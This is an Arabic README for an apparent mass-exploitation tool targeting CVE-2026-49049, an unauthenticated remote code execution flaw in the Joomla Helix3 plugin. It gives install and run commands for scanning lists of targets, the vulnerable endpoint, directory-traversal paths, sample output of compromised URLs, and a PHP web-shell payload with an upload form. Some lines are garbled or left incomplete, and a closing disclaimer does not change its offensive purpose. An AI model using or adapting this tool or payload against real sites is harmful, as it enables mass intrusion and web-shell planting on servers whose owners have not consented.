
ماسح ضوئي شامل للثغرات لـ CVE-2026-49049 – تنفيذ تعليمات برمجية عن بُعد غير مصادق عليه في إضافة Joomla Helix3. متعدد الخيوط، يكتشف حمولات PHP المنفذة والخفام.
ماسح ثغرات شامل لـ CVE-2026-49049 - تنفيذ كود عن بُعد بدون مصادقة في إطار عمل Joomla Helix3.
تقوم هذه الأداة بفحص عدة مواقع Joomla للتحقق من ثغرة CVE-2026-49049 الموجودة في إضافة Helix3. تسمح هذه الثغرة لمهاجم غير مصادق عليه برفع وتنفيذ كود PHP عشوائي على الخادم المستهدف.
يحاول الماسح القيام بما يلي:
com_ajax مع إضافة helix3.requestspip install requests
🛠 التثبيت
git clone https://github.com/Jenderal92/CVE-2026-49049.git
cd CVE-2026-49049
chmod +x cve-2026-49049.py
🚀 الاستخدام
python2 cve-2026-49049.py targets.txt
صيغة الإدخال
يجب أن يحتوي كل سطر في targets.txt على نطاق أو عنوان IP واحد:
example.com
https://example.com
http://192.168.1.100
ملفات المخرجات
الملف الوصف results.txt عناوين URL المعرضة للثغرة حيث تم تنفيذ الحمولة rez.txt عناوين URL حيث تم رفع الحمولة دون تنفيذها (PHP خام)
مثال على المخرجات
============================================================
CVE-2026-49049 Mass Scanner
Results: results.txt (executed)
Raw PHP: rez.txt (not executed)
============================================================
[*] Loaded 150 targets
[*] Using 20 threads
[+] VULNERABLE: https://target.com
[*] RAW PHP: https://target2.com
[-] NOT VULNERABLE: https://secure.com
============================================================
[+] Selesai!
[+] Vulnerable: 12
[+] Raw PHP: 5
[+] Vulnerable URLs:
https://target.com/tmp_123456.php.json
⚙️ الإعدادات
يمكنك تعديل المتغيرات التالية داخل السكربت:
المتغير الافتراضي الوصف THREADS 20 عدد الخيوط المتزامنة PATHS ['../../../', '../../../../'] مسارات اجتياز الدليل TIMEOUT 5 مهلة طلب HTTP RESULT_FILE 'results.txt' ملف الإخراج للمواقع المعرضة للثغرة RAW_RESULT_FILE 'rez.txt' ملف الإخراج لمواقع PHP الخام
🧠 كيف يعمل
يرسل السكربت طلب POST إلى:
/index.php?option=com_ajax&plugin=helix3&format=json
مع حمولة تقوم بما يلي:
ثم يتحقق مما إذا كان الملف متاحًا وما إذا كان كود PHP يُنفَّذ أم يُعرض كنص عادي فقط.
مثال على الحمولة
<?php
$s = "Shinday";
echo '<center><pre><br><br><h1 style="color:red;">'.$s.'</h1><br>'.php_uname()."\n".'<br><br><br>';
// ... upload form
?>
⚠️ إخلاء المسؤولية
هذه الأداة مخصصة للأغراض التعليمية وللاختبار المصرح به فقط.
الاستخدام غير المصرح به لهذه الأداة ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها يعد أمرًا غير قانوني. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.
لمزيد من إخلاء المسؤولية يمكنك الاطلاع على إخلاء المسؤولية في غلاف Jenderal92. يمكنك التحقق منه هنا !!!